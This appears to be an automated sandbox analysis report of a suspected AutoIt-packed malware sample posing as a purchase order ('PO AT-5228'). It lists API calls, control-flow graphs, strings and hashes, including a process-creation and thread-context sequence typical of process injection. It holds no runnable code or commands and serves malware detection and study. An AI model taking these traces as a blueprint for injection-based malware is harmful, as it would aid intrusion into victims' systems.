                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 2378138488-0
                                                                                        • Opcode ID: a6d9755e3a405eb314a99bd89e55aada31577b72995d3e1d34e91e965169a16b
                                                                                        • Instruction ID: 99dbe71ec666097dbfe7ca37a895fd8a467c1470a2cc95af079509467a1843e9
                                                                                        • Opcode Fuzzy Hash: a6d9755e3a405eb314a99bd89e55aada31577b72995d3e1d34e91e965169a16b
                                                                                        • Instruction Fuzzy Hash: 1EC109B1A00219AADF11DF95CC81EEEBBFDEF59310F0040EAE609E6151DB749A448F65

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 1170 b63742-b63762 1172 b63764-b63767 1170->1172 1173 b637c2-b637c4 1170->1173 1174 b637c8 1172->1174 1175 b63769-b63770 1172->1175 1173->1172 1176 b637c6 1173->1176 1180 b637ce-b637d1 1174->1180 1181 bd1e00-bd1e2e call b62ff6 call b7e312 1174->1181 1177 b63776-b6377b 1175->1177 1178 b6382c-b63834 PostQuitMessage 1175->1178 1179 b637ab-b637b3 DefWindowProcW 1176->1179 1185 bd1e88-bd1e9c call ba4ddd 1177->1185 1186 b63781-b63783 1177->1186 1187 b637f2-b637f4 1178->1187 1188 b637b9-b637bf 1179->1188 1182 b637f6-b6381d SetTimer RegisterWindowMessageW 1180->1182 1183 b637d3-b637d4 1180->1183 1216 bd1e33-bd1e3a 1181->1216 1182->1187 1192 b6381f-b6382a CreatePopupMenu 1182->1192 1189 b637da-b637ed KillTimer call b63847 call b6390f 1183->1189 1190 bd1da3-bd1da6 1183->1190 1185->1187 1209 bd1ea2 1185->1209 1193 b63836-b63840 call b7eb83 1186->1193 1194 b63789-b6378e 1186->1194 1187->1188 1189->1187 1202 bd1ddc-bd1dfb MoveWindow 1190->1202 1203 bd1da8-bd1daa 1190->1203 1192->1187 1210 b63845 1193->1210 1198 bd1e6d-bd1e74 1194->1198 1199 b63794-b63799 1194->1199 1198->1179 1205 bd1e7a-bd1e83 call b9a5f3 1198->1205 1207 bd1e58-bd1e68 call ba55bd 1199->1207 1208 b6379f-b637a5 1199->1208 1202->1187 1211 bd1dac-bd1daf 1203->1211 1212 bd1dcb-bd1dd7 SetFocus 1203->1212 1205->1179 1207->1187 1208->1179 1208->1216 1209->1179 1210->1187 1211->1208 1217 bd1db5-bd1dc6 call b62ff6 1211->1217 1212->1187 1216->1179 1221 bd1e40-bd1e53 call b63847 call b64ffc 1216->1221 1217->1187 1221->1179
                                                                                        APIs
                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00B637B3
                                                                                        • KillTimer.USER32(?,00000001), ref: 00B637DD
                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B63800
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B6380B
                                                                                        • CreatePopupMenu.USER32 ref: 00B6381F
                                                                                        • PostQuitMessage.USER32(00000000), ref: 00B6382E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                        • String ID: TaskbarCreated
                                                                                        • API String ID: 129472671-2362178303

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00B63E79
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00B63E88
                                                                                        • LoadIconW.USER32(00000063), ref: 00B63E9E
                                                                                        • LoadIconW.USER32(000000A4), ref: 00B63EB0
                                                                                        • LoadIconW.USER32(000000A2), ref: 00B63EC2
                                                                                          • Part of subcall function 00B64024: LoadImageW.USER32(00B60000,00000063,00000001,00000010,00000010,00000000), ref: 00B64048
                                                                                        • RegisterClassExW.USER32(?), ref: 00B63F30
                                                                                          • Part of subcall function 00B63F53: GetSysColorBrush.USER32(0000000F), ref: 00B63F86
                                                                                          • Part of subcall function 00B63F53: RegisterClassExW.USER32(00000030), ref: 00B63FB0
                                                                                          • Part of subcall function 00B63F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B63FC1
                                                                                          • Part of subcall function 00B63F53: InitCommonControlsEx.COMCTL32(?), ref: 00B63FDE
                                                                                          • Part of subcall function 00B63F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B63FEE
                                                                                          • Part of subcall function 00B63F53: LoadIconW.USER32(000000A9), ref: 00B64004
                                                                                          • Part of subcall function 00B63F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B64013
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                        • String ID: #$0$AutoIt v3
                                                                                        • API String ID: 423443420-4155596026

                                                                                         Control-flow Graph

                                                                                         • Graph edge data omitted; entry block 195fc80-195fd2e
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0195FD51
                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0195FF77
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1694924142.000000000195D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0195D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_195d000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFileFreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 204039940-0

                                                                                         Control-flow Graph

                                                                                         • Graph edge data omitted; entry block b649fb-b64a25
                                                                                        APIs
                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00B64A1D
                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00BD41DB
                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00BD421A
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00BD4249
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: QueryValue$CloseOpen
                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                        • API String ID: 1586453840-614718249

                                                                                         Control-flow Graph

                                                                                         • Graph edge data omitted; single block b636b8-b63728
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B636E6
                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B63707
                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,00B63AA3,?), ref: 00B6371B
                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,00B63AA3,?), ref: 00B63724
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Window$CreateShow
                                                                                        • String ID: AutoIt v3$edit
                                                                                        • API String ID: 1584632944-3779509399

                                                                                         Control-flow Graph

                                                                                         • Graph edge data omitted; entry block 195fa70-195fb7c
                                                                                        APIs
                                                                                          • Part of subcall function 0195F960: Sleep.KERNEL32(000001F4), ref: 0195F971
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0195FB72
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1694924142.000000000195D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0195D000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: CreateFileSleep
                                                                                        • String ID: 9OXMYGIHOY7TWA5
                                                                                        • API String ID: 2694422964-1748768190

                                                                                         Control-flow Graph

                                                                                         • Graph edge data omitted; entry block b64139-b64160
                                                                                        APIs
                                                                                          • Part of subcall function 00B641A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00B639FE,?,00000001), ref: 00B641DB
                                                                                        • _free.LIBCMT ref: 00BD36B7
                                                                                        • _free.LIBCMT ref: 00BD36FE
                                                                                          • Part of subcall function 00B6C833: __wsplitpath.LIBCMT ref: 00B6C93E
                                                                                          • Part of subcall function 00B6C833: _wcscpy.LIBCMT ref: 00B6C953
                                                                                          • Part of subcall function 00B6C833: _wcscat.LIBCMT ref: 00B6C968
                                                                                          • Part of subcall function 00B6C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00B6C978
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                        • API String ID: 805182592-1757145024
                                                                                        APIs
                                                                                          • Part of subcall function 00B65374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00C21148,?,00B661FF,?,00000000,00000001,00000000), ref: 00B65392
                                                                                          • Part of subcall function 00B649FB: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00B64A1D
                                                                                        • _wcscat.LIBCMT ref: 00BD2D80
                                                                                        • _wcscat.LIBCMT ref: 00BD2DB5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: _wcscat$FileModuleNameOpen
                                                                                        • String ID: \$\Include\
                                                                                        • API String ID: 3592542968-2640467822
                                                                                        • Opcode ID: 4f62e18645a7714a5a6e87fad4d453144dd5a87f5a94e2aa4880d8223bee3467
                                                                                        • Instruction ID: a65bfd3160af0cf7540518b199a0a9fa253951e03389684f6812298a87df6db8
                                                                                        • Opcode Fuzzy Hash: 4f62e18645a7714a5a6e87fad4d453144dd5a87f5a94e2aa4880d8223bee3467
                                                                                        • Instruction Fuzzy Hash: 27518275424340AFC724EF59D881EAEB7F4FF59300B4005AEF64993660EB749E19CB52
                                                                                        APIs
                                                                                        • __getstream.LIBCMT ref: 00B834FE
                                                                                          • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00B83539
                                                                                        • __wopenfile.LIBCMT ref: 00B83549
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                        • String ID: <G
                                                                                        • API String ID: 1820251861-2138716496
                                                                                        • Opcode ID: c6f1557a79406fd25012a9e9f2aa39f447f5966ca70b8de1c1b708118ab0284f
                                                                                        • Instruction ID: 7ed87ce350600c9f75c7363f0dc0a6be7a41035e1f7e4bff052f47e31adb2b31
                                                                                        • Opcode Fuzzy Hash: c6f1557a79406fd25012a9e9f2aa39f447f5966ca70b8de1c1b708118ab0284f
                                                                                        • Instruction Fuzzy Hash: 30110670A002069BDB22BF708C426AE37E4EF05F50B1884E5E815CB2B1EB74CA41DBA1
                                                                                        APIs
                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00B7D28B,SwapMouseButtons,00000004,?), ref: 00B7D2BC
                                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00B7D28B,SwapMouseButtons,00000004,?,?,?,?,00B7C865), ref: 00B7D2DD
                                                                                        • RegCloseKey.KERNEL32(00000000,?,?,00B7D28B,SwapMouseButtons,00000004,?,?,?,?,00B7C865), ref: 00B7D2FF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValue
                                                                                        • String ID: Control Panel\Mouse
                                                                                        • API String ID: 3677997916-824357125
                                                                                        • Opcode ID: e75821033a5bfe7ec3b9d9a1b39e5d4ab643f68acf94b66f45177e2ee24f5ad2
                                                                                        • Instruction ID: d639f56052433791692112c99ae3fcf7677bf8700a27dce2ecbaff45fb0bb852
                                                                                        • Opcode Fuzzy Hash: e75821033a5bfe7ec3b9d9a1b39e5d4ab643f68acf94b66f45177e2ee24f5ad2
                                                                                        • Instruction Fuzzy Hash: 92113975611208BFDB218FA8CC84EAF7BF8EF44794F1088A9E819D7111E671AE419B64
                                                                                        APIs
                                                                                        • CreateProcessW.KERNEL32(?,00000000), ref: 0195F11B
                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0195F1B1
                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0195F1D3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1694924142.000000000195D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0195D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_195d000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 2438371351-0
                                                                                        • Opcode ID: dbcdd5886b880b5c161ff2c694cfceffc24b8721b5d78ef826e157d7e74dbfef
                                                                                        • Instruction ID: 1c2bcfb123bd8cc1b282436c4c384226294a77315734db334b19d87e0dc96e99
                                                                                        • Opcode Fuzzy Hash: dbcdd5886b880b5c161ff2c694cfceffc24b8721b5d78ef826e157d7e74dbfef
                                                                                        • Instruction Fuzzy Hash: 2A621A30A14218DBEB24CFA4C850BEEB776EF58700F1091A9D60DEB390E7759E81CB59
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                        • String ID:
                                                                                        • API String ID: 3877424927-0
                                                                                        • Opcode ID: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                                                                        • Instruction ID: 4fd362f54bd0ef3a0ad82601b97059a5c01ba0a9286229fab1d5649f31b10480
                                                                                        • Opcode Fuzzy Hash: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                                                                        • Instruction Fuzzy Hash: B35185B4A04205ABDB24BF69C89596E77E1EF40F20F2486A9F835962F0E775DF50CB40
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00B7EBB2
                                                                                          • Part of subcall function 00B651AF: _memset.LIBCMT ref: 00B6522F
                                                                                          • Part of subcall function 00B651AF: _wcscpy.LIBCMT ref: 00B65283
                                                                                          • Part of subcall function 00B651AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B65293
                                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00B7EC07
                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B7EC16
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BD3C88
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 1378193009-0
                                                                                        • Opcode ID: 81d26eaa3a875d0120cdbc8906cabe71426ec61b4ac6ed50d7b89fdb8435643d
                                                                                        • Instruction ID: 7d66fea3d5fd45ca7972e36d97e216ba7f3b5866cd6fb8bd2ff21c7ddc930e4b
                                                                                        • Opcode Fuzzy Hash: 81d26eaa3a875d0120cdbc8906cabe71426ec61b4ac6ed50d7b89fdb8435643d
                                                                                        • Instruction Fuzzy Hash: 9321F8745047849FE7339B288855BEAFBECDF05704F0404DEE6AE56242D7746A848B52
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00BD3725
                                                                                        • GetOpenFileNameW.COMDLG32 ref: 00BD376F
                                                                                          • Part of subcall function 00B6660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B653B1,?,?,00B661FF,?,00000000,00000001,00000000), ref: 00B6662F
                                                                                          • Part of subcall function 00B640A7: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00B640C6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                                                        • String ID: X
                                                                                        • API String ID: 3777226403-3081909835
                                                                                        • Opcode ID: d956f8a8af25d05a9e9abbb7dad6ef601e0697ae66b97af7e78bd4ad270dcee7
                                                                                        • Instruction ID: bec07e69d49c3b629dcd5cdea0da83d0fc9e01997cea7ec548f36de6c915538e
                                                                                        • Opcode Fuzzy Hash: d956f8a8af25d05a9e9abbb7dad6ef601e0697ae66b97af7e78bd4ad270dcee7
                                                                                        • Instruction Fuzzy Hash: CC21A571A106989FCF01EFD4D845BEEBBF99F49704F0040AAE405B7241DFB89A898F65
                                                                                        APIs
                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00BAC72F
                                                                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00BAC746
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Temp$FileNamePath
                                                                                        • String ID: aut
                                                                                        • API String ID: 3285503233-3010740371
                                                                                        • Opcode ID: 120ada28184f4f767256a692e27bc57298995fbfea9486bb1a1cf030cfee232d
                                                                                        • Instruction ID: 75187146b50d1745a7324c80c2dd5287ceef62af2ce968eb682b5d2072c82dd1
                                                                                        • Opcode Fuzzy Hash: 120ada28184f4f767256a692e27bc57298995fbfea9486bb1a1cf030cfee232d
                                                                                        • Instruction Fuzzy Hash: 18D05E7150030EABDB10AB90DC4EFCAB76C9700709F0001A07750AA0B1DAF0E6998B54
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 798aabf7a103670e4b0dc854748f2a62c595a97f67e83e8a8b8497ef77ddbc2d
                                                                                        • Instruction ID: 4c75b44cbc7a958f31e48d096c24f8e550e4b8d4fb6a1b5a5fb136160f88a5a2
                                                                                        • Opcode Fuzzy Hash: 798aabf7a103670e4b0dc854748f2a62c595a97f67e83e8a8b8497ef77ddbc2d
                                                                                        • Instruction Fuzzy Hash: F6F15C716083019FC710DF28C881B6EBBE5FF88314F1489ADF9999B252D770E945CB82
                                                                                        APIs
                                                                                        • __FF_MSGBANNER.LIBCMT ref: 00B83973
                                                                                          • Part of subcall function 00B881C2: __NMSG_WRITE.LIBCMT ref: 00B881E9
                                                                                          • Part of subcall function 00B881C2: __NMSG_WRITE.LIBCMT ref: 00B881F3
                                                                                        • __NMSG_WRITE.LIBCMT ref: 00B8397A
                                                                                          • Part of subcall function 00B8821F: GetModuleFileNameW.KERNEL32(00000000,00C20312,00000104,00000000,00000001,00000000), ref: 00B882B1
                                                                                          • Part of subcall function 00B8821F: ___crtMessageBoxW.LIBCMT ref: 00B8835F
                                                                                          • Part of subcall function 00B81145: ___crtCorExitProcess.LIBCMT ref: 00B8114B
                                                                                          • Part of subcall function 00B81145: ExitProcess.KERNEL32 ref: 00B81154
                                                                                          • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
                                                                                        • RtlAllocateHeap.NTDLL(01920000,00000000,00000001,00000001,00000000,?,?,00B7F507,?,0000000E), ref: 00B8399F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 1372826849-0
                                                                                        • Opcode ID: b843952d22f000411bc1f6393dbbae0d1da61441d08a7f1731caff0a14539edf
                                                                                        • Instruction ID: 264da0527cfde8a5a4c9fdbbe3589eea6181a2c1b29a8e7b9cf231222e7d9735
                                                                                        • Opcode Fuzzy Hash: b843952d22f000411bc1f6393dbbae0d1da61441d08a7f1731caff0a14539edf
                                                                                        • Instruction Fuzzy Hash: BE0196352852119BE6213B29DC56B2E23C8DB81F64B2500AAF5079B2B2DEF0DD41C760
APIs
• CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00BAC385,?,?,?,?,?,00000004), ref: 00BAC6F2
• SetFileTime.KERNEL32(00000000,?,00000000,?,?,00BAC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00BAC708
• CloseHandle.KERNEL32(00000000,?,00BAC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00BAC70F
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
